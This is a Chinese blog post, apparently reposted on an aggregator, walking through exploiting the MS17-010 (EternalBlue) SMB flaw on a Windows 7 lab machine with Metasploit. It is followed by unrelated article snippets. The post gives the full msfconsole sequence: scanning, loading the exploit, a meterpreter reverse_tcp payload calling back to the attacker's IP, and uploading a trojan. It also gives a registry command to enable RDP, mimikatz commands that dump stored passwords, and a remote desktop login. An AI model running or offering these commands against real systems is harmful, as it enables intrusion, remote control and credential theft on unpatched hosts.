python调用msfconsole全自动永恒之蓝攻击_MSF之MS17-010永恒之蓝漏洞利用

Loading...

# MSF之MS17-010永恒之蓝漏洞利用

1. 准备阶段

2. 扫描漏洞

3. 漏洞攻击

---

## 准备阶段

**实验准备环境:**

攻击机:虚拟机kali系统IP:192.168.207.130

被攻击机:虚拟机Win7x64系统IP:10.101.2.11(关闭了防火墙)

攻击工具:kali自带MsfConsole工具

---

## 扫描漏洞

在kali终端内输入:msfconsole

```

msf >use auxiliary/scanner/smb/smb_ms17_010(加载扫描exp)

msf >set RHOSTS 10.101.2.11(设置被扫描IP)

msf >run(进行扫描,观察是否存在该漏洞)

```

![](https://blog.deepfal.cn/usr/uploads/2020/09/680524442.png)

由上图可知,该被攻击机存在MS17-010漏洞

---

## 漏洞攻击

```

use exploit/windows/smb/ms17_010_eternalblue (加载攻击模块)

set RHOST 10.101.2.11(被攻击机IP)

set LHOST 192.168.207.130(设置本地IP)

set LPORT 4444(设置连接端口)

set payload windows/x64/meterpreter/reverse_tcp(配置回链方式)

```

![配置信息](https://blog.deepfal.cn/usr/uploads/2020/09/1537039262.png)

```

show options(查看配置相关信息)

```

![](https://blog.deepfal.cn/usr/uploads/2020/09/1474940872.png)

![](https://blog.deepfal.cn/usr/uploads/2020/09/3988290582.png)

```

meterpreter >exploit(开始攻击)

```

![](https://blog.deepfal.cn/usr/uploads/2020/09/470988312.png)

**攻击成功!**

```

sysinfo(爆出系统信息)

screenshot(截屏,截屏后的图片存放在/root/中)

meterpreter >shell(进入靶机cmd)

```

![](https://blog.deepfal.cn/usr/uploads/2020/09/3265018609.png)

此时,可以新建文件夹,然后

```

meterpreter >upload植入已经写好的木马!

```

也可以通过使用msf中的 `mimikatz`,来爆出靶机的**用户名和密码**,以下是其过程

首先

```

netstat -an

```

![](https://cc.deepfal.cn/img/2019-12-9/20181129164838972.png)

如果没有开启3389端口,可以使用以下命令在cmd中开启

```

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

```

其次

```

meterpreter > load mimikatz

meterpreter > help

```

![](https://cc.deepfal.cn/img/2019-12-9/20181129165924367.png)

```

meterpreter > msv

```

![](https://cc.deepfal.cn/img/2019-12-9/20181129170023168.png)

```

meterpreter > ssp

```

![](https://cc.deepfal.cn/img/2019-12-9/20181129170118762.png)

```

meterpreter > wdigest

```

![](https://cc.deepfal.cn/img/2019-12-9/20181129170235910.png)

```

meterpreter > kerberos

```

![](https://cc.deepfal.cn/img/2019-12-9/20181129170417741.png)

**接下来,就是远程登录靶机!**

```

rdesktop 10.101.2.11

```

![](https://cc.deepfal.cn/img/2019-12-9/20181129195356641.png)

**成功!**

最后修改:2020 年 09 月 19 日 06 : 39 PM

© 允许规范转载

赞赏

如果觉得我的文章对你有用,请随意赞赏~

×Close

赞赏作者

扫一扫支付

支付宝支付

微信支付

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/264082.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

容器部署解决方案Docker

一、Docker简介 1.1 虚拟化 【什么是虚拟化】 在计算机中,虚拟化(英语:Virtualization)是一种资源管理技术,是将计算机的各种实体资源,如服务器、网络、内存及存储等,予以抽象、转换后呈现出来&…

BREW做的第一个程序--Hello world!

这几天开始做BREW开发了,刚开始挺晕的。又是C指针,又是BREW的SDK文档,还有环境配置,一大堆东东,真是让人手忙脚乱。好不容易配好了环境,写出了第一个Hello world!程序。感觉还不错,就把代码和想…

careercup-链表 2.1

2.1 编写代码,移除未排序链表中的重复节点。 不使用临时缓存: 如果不允许使用临时的缓存(即不能使用额外的存储空间),那需要两个指针, 当第一个指针指向某个元素时,第二个指针把该元素后面与它相同的元素删除&#xff…

随机排列_“按字母顺序排列”其实是种随机顺序

闲话之前有聊过,微信公众号这边接的广告不多,主要收益来自于微信自带的中插广告。后来同学们还开玩笑说“研究半天没发现这个图片哪里没品了,才发现是广告。”另外还有一部分收益,来自于各位的打赏。鉴于大部分人都是打赏一两块钱…

Python之IO模式 阻塞式io 非阻塞io 多路复用io 异步io 信号驱动io

参考:https://www.cnblogs.com/alex3714/articles/5248247.html 提高:http://www.cnblogs.com/alex3714/articles/5876749.html selectors模块 https://www.cnblogs.com/alex3714/articles/5248247.html转载于:https://www.cnblogs.com/Samuel-Leung/p/10805012.html

日本印象

转自:http://hi.baidu.com/tttt182在日本工作生活三年了,跟大家谈谈我对日本和日本人的亲身感受。第一次在天涯发贴,随便写写,可能会有一些乱,请大家见谅。 1、日本人的个子。的确比较矮。在很多公共场合里挂的镜子&am…

android 获取应用的资源id和uri

2019独角兽企业重金招聘Python工程师标准>>> 在某些应用中,为了实现应用apk资源放入重复利用,或者使用反射得到本应用的资源,需要使用反射反射方式获得,但Resources类中也自带了这种获取方式,并且功能更加强…

Android OOM的解决方式

版权声明:本文为博主原创文章。转载请注明出处。 https://blog.csdn.net/Main_Stage/article/details/26150189 尽量不要使用setImageBitmap或setImageResource或BitmapFactory.decodeResource来设置一张大图,由于这些函数在完毕decode后,终于…

python中的成员运算符_在Python中使用成员运算符的示例

下表列出了所有python语言支持的成员运算符。例如:试试下面的例子就明白了所有的python编程语言提供会员运算符:#!/usr/bin/pythona 10b 20list [1, 2, 3, 4, 5 ];if ( a in list ):print "line 1 - a is available in the given list"else…

(SQL语句)按指定时间段分组统计

我现在有一张表: 列名1 时间 03174190188 2009-11-01 07:17:39.217 015224486575 2009-11-01 08:01:17.153 013593006926 2009-11-12 08:04:46.560 013599584239 2009-11-22 08:53:27.763 013911693526 2009-11-23 08:53:51.683 013846472440 2009…

如何查看Exchange2010中邮箱数据库的用户邮箱占用情况

在EMS界面,用以下命令可以看到数据库的使用情况,并将文件放在指定文件显示: Get-Mailbox -database DBNAME|Get-Mailboxstatistics |sort totalitemsize -desc |ft displayname,totalitemsize,itemcount > D:\report\DBNAME.csv 转载于:ht…

数据库迁移_数据库迁移了解一下

mongodb数据迁移因服务器到期,需要将之前机器上面的数据进行数据迁移,并将服务全部docker化备份首先需要将现有即将到期的服务器上面的mongo数据进行备份mongodump -h dbhost -d dbname -o dbdirectory-h:mongodb所在服务器地址,可…

extern “C”总结

学了就忘,忘了再学。有时感觉自己几乎就是一个跳梁小丑。没有办法,只好多记些笔记。本文版权归作者和博客园共有FROM: http://www.cnblogs.com/graphics/archive/2010/12/24/1916343.html经常看到如下代码:#ifdef _cplusplusexter…

人脸颜值评分软件_在线算个颜值,特科学的那种 | 知多少

用 AI,科学的为颜值打个分。用 AI,打造科学颜值打分器https://www.zhihu.com/video/1185672892095848448图文版本送给不方便打开的朋友 (●u●)」如何科学的为颜值打个分?三庭五眼、四高三低?脸部是否对称?是否与本民族…

图片翻转

图片翻转 原文:图片翻转本人录制技术视频地址:https://edu.csdn.net/lecturer/1899 欢迎观看。这一节继续为大家介绍CSS3的动画效果: 图片翻转。 在iOS中的章节中,我也介绍过类似的效果,如果感兴趣的话,请点击这里查看&#xff1a…

【原】页面跳转以及表单提交中有中文的解决办法

这两天一直碰到一个郁闷的问题,在对表单进行提交的时候,用户名是中文的,怎么测试都不通过, 今天上午突然想起来是不是因为中文字符编码的问题!经过测试,果然是因为这个问题! 现在把解决方法贴出来!呵呵&…

架构设计学习网址

http://learninghard.blog.51cto.com/all/6146675转载于:https://www.cnblogs.com/haiy/p/4155727.html

实验吧之NSCTF misc250

下载的是一个流,用wireshark打开,由于原题是这样的:小绿在学习了wireshark后,在局域网内抓到了室友下载的小东东0.0 你能帮他找到吗?说明我们应该重点关注http传送的东西: 这里面一共有四个http文件&#x…

西澳大学商科专业排名_澳洲西澳大学优势专业排名多少

澳洲西澳大学优势专业排名多少西澳大学农业和林业专业在2018年QS世界排名中排名第32西澳大学解剖学和生理学专业在2018年QS世界排名中排名第13西澳大学地球与海洋科学专业在2018年QS世界排名中排名第32西澳大学土木结构工程专业在2018年QS世界排名中排名第37西澳大学矿产和采矿…

基于SOUI开发的应用展示

本页面列出基于SOUI开发的产品 欢迎使用SOUI的朋友提供资源:setoutsoft#qq.com #-> U大师 http://www.udashi.com EiisysIM: 是一款为工作场景而设计的企业即时通讯软件, ,含PC版和手机版。具有完善的即时通讯、文件传输、语音通话等功能。通讯录由企…